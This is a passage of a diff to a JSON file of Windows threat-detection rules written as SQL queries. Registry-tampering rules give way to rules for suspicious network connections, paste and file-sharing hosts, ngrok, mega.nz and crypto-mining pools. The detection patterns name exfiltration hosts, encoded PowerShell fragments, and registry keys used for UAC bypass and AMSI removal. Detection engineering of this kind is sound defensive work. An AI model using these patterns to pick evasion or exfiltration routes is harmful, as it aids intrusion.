"Terminal Server Client Connection History Cleared - Registry", + "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "status": "test", + "description": "Detects the deletion of registry keys containing the MSTSC connection history", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1070", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND NewValue LIKE '%powershell%' ESCAPE '\\' AND NewValue LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" + "filename": "registry_delete_mstsc_history_cleared.yml" }, { - "title": "Potential Persistence Via TypedPaths", - "id": "086ae989-9ca6-4fe7-895a-759c5544f247", - "status": "experimental", - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Removal Of AMSI Provider Registry Keys", + "id": "41d1058a-aea7-4952-9293-29eaaf516465", + "status": "test", + "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventType = 'DeleteKey' AND (TargetObject LIKE '%{2781761E-28E0-4109-99FE-B9D127C57AFE}' ESCAPE '\\' OR TargetObject LIKE '%{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_typed_paths.yml" + "filename": "registry_delete_removal_amsi_registry_key.yml" }, { - "title": "PowerShell Logging Disabled Via Registry Key Tampering", - "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", - "status": "experimental", - "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", - "author": "frack113", + "title": "Suspicious Outbound Kerberos Connection", + "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", + "status": "test", + "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.credential_access", + "attack.t1558", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Web Browsers" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((DestinationPort = '88' AND Initiated = 'true') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" ], - "filename": "registry_set_powershell_logging_disabled.yml" + "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" }, { - "title": "Potential EventLog File Location Tampering", - "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", + "title": "Equation Editor Network Connection", + "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", "status": "experimental", - "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", - "author": "D3F7A5105", + "description": "Detects network connections from Equation Editor", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1203" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (NewValue LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\'" ], - "filename": "registry_set_evtx_file_key_tamper.yml" + "filename": "net_connection_win_eqnedt.yml" }, { - "title": "Blue Mockingbird - Registry", - "id": "92b0b372-a939-44ed-a11b-5136cf680e27", - "status": "experimental", - "description": "Attempts to detect system changes made by Blue Mockingbird", - "author": "Trent Liffick (@tliffick)", + "title": "Download a File with IMEWDBLD.exe", + "id": "8d7e392e-9b28-49e1-831d-5949c6281228", + "status": "test", + "description": "Use IMEWDBLD.exe (built-in to windows) to download a file", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1112", - "attack.t1047" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Initiated = 'true' AND NewProcessName LIKE '%\\\\IMEWDBLD.exe' ESCAPE '\\')" ], - "filename": "registry_set_mal_blue_mockingbird.yml" + "filename": "net_connection_win_imewdbld.yml" }, { - "title": "Potential Persistence Via Outlook Today Pages", - "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", - "status": "experimental", - "description": "Detects potential persistence activity via outlook today pages. An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Microsoft Binary Suspicious Communication Endpoint", + "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", + "status": "test", + "description": "Detects an executable in the Windows folder accessing suspicious domains", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Unknown", + "@subTee in your network" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE 'C:\\\\PerfLogs%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AppData\\\\Temp\\\\%' ESCAPE '\\') AND (Initiated = 'true' AND (DestinationHostname LIKE '%.ghostbin.co' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_outlook_todaypage.yml" + "filename": "net_connection_win_binary_susp_com.yml" }, { - "title": "UAC Bypass via Event Viewer - Registry Set", - "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", - "status": "experimental", - "description": "Detects UAC bypass method using Windows event viewer", - "author": "Florian Roth (Nextron Systems)", + "title": "Notepad Making Network Connection", + "id": "e81528db-fc02-45e8-8e98-4e84aba1f10b", + "status": "test", + "description": "Detects suspicious network connection by Notepad", + "author": "EagleEye Team", "tags": [ + "attack.command_and_control", + "attack.execution", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" ], - "filename": "registry_set_uac_bypass_eventvwr.yml" + "filename": "net_connection_win_notepad_network_connection.yml" }, { - "title": "Registry Persistence via Explorer Run Key", - "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", + "title": "Silenttrinity Stager Msbuild Activity", + "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", "status": "test", - "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", - "author": "Florian Roth (Nextron Systems), oscd.community", + "description": "Detects a possible remote connections to Silenttrinity c2", + "author": "Kiran kumar s, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.execution", + "attack.t1127.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((NewValue LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR NewValue LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" ], - "filename": "registry_set_susp_reg_persist_explorer_run.yml" + "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" }, { - "title": "Suspicious Environment Variable Has Been Registered", - "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", - "status": "test", - "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Dropbox API Usage", + "id": "25eabf56-22f0-4915-a1ed-056b8dae0a68", + "status": "experimental", + "description": "Detects an executable that isn't dropbox but communicates with the Dropbox API", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate use of the API with a tool that the author wasn't aware of" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((Initiated = 'true' AND (DestinationHostname LIKE '%api.dropboxapi.com' ESCAPE '\\' OR DestinationHostname LIKE '%content.dropboxapi.com' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + ], + "filename": "net_connection_win_susp_dropbox_api.yml" + }, + { + "title": "Communication To Ngrok.Io", + "id": "18249279-932f-45e2-b37a-8925f2597670", + "status": "experimental", + "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of ngrok.io" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (NewValue IN ('powershell', 'pwsh') OR (NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR NewValue LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR NewValue LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%SW52b2tlL%' ESCAPE '\\' OR NewValue LIKE '%ludm9rZS%' ESCAPE '\\' OR NewValue LIKE '%JbnZva2Ut%' ESCAPE '\\' OR NewValue LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR NewValue LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR NewValue LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (NewValue LIKE 'SUVY%' ESCAPE '\\' OR NewValue LIKE 'SQBFAF%' ESCAPE '\\' OR NewValue LIKE 'SQBuAH%' ESCAPE '\\' OR NewValue LIKE 'cwBhA%' ESCAPE '\\' OR NewValue LIKE 'aWV4%' ESCAPE '\\' OR NewValue LIKE 'aQBlA%' ESCAPE '\\' OR NewValue LIKE 'R2V0%' ESCAPE '\\' OR NewValue LIKE 'dmFy%' ESCAPE '\\' OR NewValue LIKE 'dgBhA%' ESCAPE '\\' OR NewValue LIKE 'dXNpbm%' ESCAPE '\\' OR NewValue LIKE 'H4sIA%' ESCAPE '\\' OR NewValue LIKE 'Y21k%' ESCAPE '\\' OR NewValue LIKE 'cABhAH%' ESCAPE '\\' OR NewValue LIKE 'Qzpc%' ESCAPE '\\' OR NewValue LIKE 'Yzpc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" ], - "filename": "registry_set_suspicious_env_variables.yml" + "filename": "net_connection_win_ngrok_io.yml" }, { - "title": "Potential Registry Persistence Attempt Via Windows Telemetry", - "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", + "title": "Communication To Mega.nz", + "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", "status": "test", - "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", - "author": "Lednyov Alexey, oscd.community, Sreeman", + "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.exfiltration", + "attack.t1567.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of mega.nz uploaders and tools" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (NewValue LIKE '%.sh%' ESCAPE '\\' OR NewValue LIKE '%.exe%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.bin%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.cmd%' ESCAPE '\\' OR NewValue LIKE '%.js%' ESCAPE '\\' OR NewValue LIKE '%.ps%' ESCAPE '\\' OR NewValue LIKE '%.vb%' ESCAPE '\\' OR NewValue LIKE '%.jar%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.msi%' ESCAPE '\\' OR NewValue LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((NewValue LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR NewValue LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" ], - "filename": "registry_set_telemetry_persistence.yml" + "filename": "net_connection_win_mega_nz.yml" }, { - "title": "UAC Bypass via Sdclt", - "id": "5b872a46-3b90-45c1-8419-f675db8053aa", - "status": "experimental", - "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", - "author": "Omer Yampel, Christian Burkard (Nextron Systems)", + "title": "Regsvr32 Network Activity", + "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "status": "test", + "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ + "attack.execution", + "attack.t1559.001", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\'" ], - "filename": "registry_set_uac_bypass_sdclt.yml" + "filename": "net_connection_win_regsvr32_network_activity.yml" }, { - "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", - "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", - "status": "experimental", - "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", - "author": "frack113", + "title": "Network Communication With Crypto Mining Pool", + "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", + "status": "stable", + "description": "Detects initiated network connections to crypto mining pools", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.impact", + "attack.t1496" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE DestinationHostname IN ('alimabi.cn', 'ap.luckpool.net', 'bcn.pool.minergate.com', 'bcn.vip.pool.minergate.com', 'bohemianpool.com', 'ca.minexmr.com', 'ca.monero.herominers.com', 'cbd.monerpool.org', 'cbdv2.monerpool.org', 'cryptmonero.com', 'crypto-pool.fr', 'crypto-pool.info', 'cryptonight-hub.miningpoolhub.com', 'd1pool.ddns.net', 'd5pool.us', 'daili01.monerpool.org', 'de.minexmr.com', 'dl.nbminer.com', 'donate.graef.in', 'donate.ssl.xmrig.com', 'donate.v2.xmrig.com', 'donate.xmrig.com', 'donate2.graef.in', 'drill.moneroworld.com', 'dwarfpool.com', 'emercoin.com', 'emercoin.net', 'emergate.net', 'ethereumpool.co', 'eu.luckpool.net', 'eu.minerpool.pw', 'fcn-xmr.pool.minergate.com', 'fee.xmrig.com', 'fr.minexmr.com', 'hellominer.com', 'herominers.com', 'huadong1-aeon.ppxxmr.com', 'iwanttoearn.money', 'jw-js1.ppxxmr.com', 'koto-pool.work', 'lhr.nbminer.com', 'lhr3.nbminer.com', 'linux.monerpool.org', 'lokiturtle.herominers.com', 'luckpool.net', 'masari.miner.rocks', 'mine.c3pool.com', 'mine.moneropool.com', 'mine.ppxxmr.com', 'mine.zpool.ca', 'mine1.ppxxmr.com', 'minemonero.gq', 'miner.ppxxmr.com', 'miner.rocks', 'minercircle.com', 'minergate.com', 'minerpool.pw', 'minerrocks.com', 'miners.pro', 'minerxmr.ru', 'minexmr.cn', 'minexmr.com', 'mining-help.ru', 'miningpoolhub.com', 'mixpools.org', 'moner.monerpool.org', 'moner1min.monerpool.org', 'monero-master.crypto-pool.fr', 'monero.crypto-pool.fr', 'monero.hashvault.pro', 'monero.herominers.com', 'monero.lindon-pool.win', 'monero.miners.pro', 'monero.riefly.id', 'monero.us.to', 'monerocean.stream', 'monerogb.com', 'monerohash.com', 'moneroocean.stream', 'moneropool.com', 'moneropool.nl', 'monerorx.com', 'monerpool.org', 'moriaxmr.com', 'mro.pool.minergate.com', 'multipool.us', 'myxmr.pw', 'na.luckpool.net', 'nanopool.org', 'nbminer.com', 'node3.luckpool.net', 'noobxmr.com', 'pangolinminer.comgandalph3000.com', 'pool.4i7i.com', 'pool.armornetwork.org', 'pool.cortins.tk', 'pool.gntl.co.uk', 'pool.hashvault.pro', 'pool.minergate.com', 'pool.minexmr.com', 'pool.monero.hashvault.pro', 'pool.ppxxmr.com', 'pool.somec.cc', 'pool.support', 'pool.supportxmr.com', 'pool.usa-138.com', 'pool.xmr.pt', 'pool.xmrfast.com', 'pool2.armornetwork.org', 'poolchange.ppxxmr.com', 'pooldd.com', 'poolmining.org', 'poolto.be', 'ppxvip1.ppxxmr.com', 'ppxxmr.com', 'prohash.net', 'r.twotouchauthentication.online', 'randomx.xmrig.com', 'ratchetmining.com', 'seed.emercoin.com', 'seed.emercoin.net', 'seed.emergate.net', 'seed1.joulecoin.org', 'seed2.joulecoin.org', 'seed3.joulecoin.org', 'seed4.joulecoin.org', 'seed5.joulecoin.org', 'seed6.joulecoin.org', 'seed7.joulecoin.org', 'seed8.joulecoin.org', 'sg.minexmr.com', 'sheepman.mine.bz', 'siamining.com', 'sumokoin.minerrocks.com', 'supportxmr.com', 'suprnova.cc', 'teracycle.net', 'trtl.cnpool.cc', 'trtl.pool.mine2gether.com', 'turtle.miner.rocks', 'us-west.minexmr.com', 'usxmrpool.com', 'viaxmr.com', 'webservicepag.webhop.net', 'xiazai.monerpool.org', 'xiazai1.monerpool.org', 'xmc.pool.minergate.com', 'xmo.pool.minergate.com', 'xmr-asia1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-us.suprnova.cc', 'xmr-usa.dwarfpool.com', 'xmr.2miners.com', 'xmr.5b6b7b.ru', 'xmr.alimabi.cn', 'xmr.bohemianpool.com', 'xmr.crypto-pool.fr', 'xmr.crypto-pool.info', 'xmr.f2pool.com', 'xmr.hashcity.org', 'xmr.hex7e4.ru', 'xmr.ip28.net', 'xmr.monerpool.org', 'xmr.mypool.online', 'xmr.nanopool.org', 'xmr.pool.gntl.co.uk', 'xmr.pool.minergate.com', 'xmr.poolto.be', 'xmr.ppxxmr.com', 'xmr.prohash.net', 'xmr.simka.pw', 'xmr.somec.cc', 'xmr.suprnova.cc', 'xmr.usa-138.com', 'xmr.vip.pool.minergate.com', 'xmr1min.monerpool.org', 'xmrf.520fjh.org', 'xmrf.fjhan.club', 'xmrfast.com', 'xmrigcc.graef.in', 'xmrminer.cc', 'xmrpool.de', 'xmrpool.eu', 'xmrpool.me', 'xmrpool.net', 'xmrpool.xyz', 'xx11m.monerpool.org', 'xx11mv2.monerpool.org', 'xxx.hex7e4.ru', 'zarabotaibitok.ru', 'zer0day.ru')" ], - "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" + "filename": "net_connection_win_crypto_mining_pools.yml" }, { - "title": "Enabling COR Profiler Environment Variables", - "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", - "status": "test", - "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "title": "Script Initiated Connection to Non-Local Network", + "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "status": "experimental", + "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", + "author": "frack113, Florian Roth", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1574.012" + "attack.command_and_control", + "attack.t1105" + ], + "falsepositives": [ + "Legitimate scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR 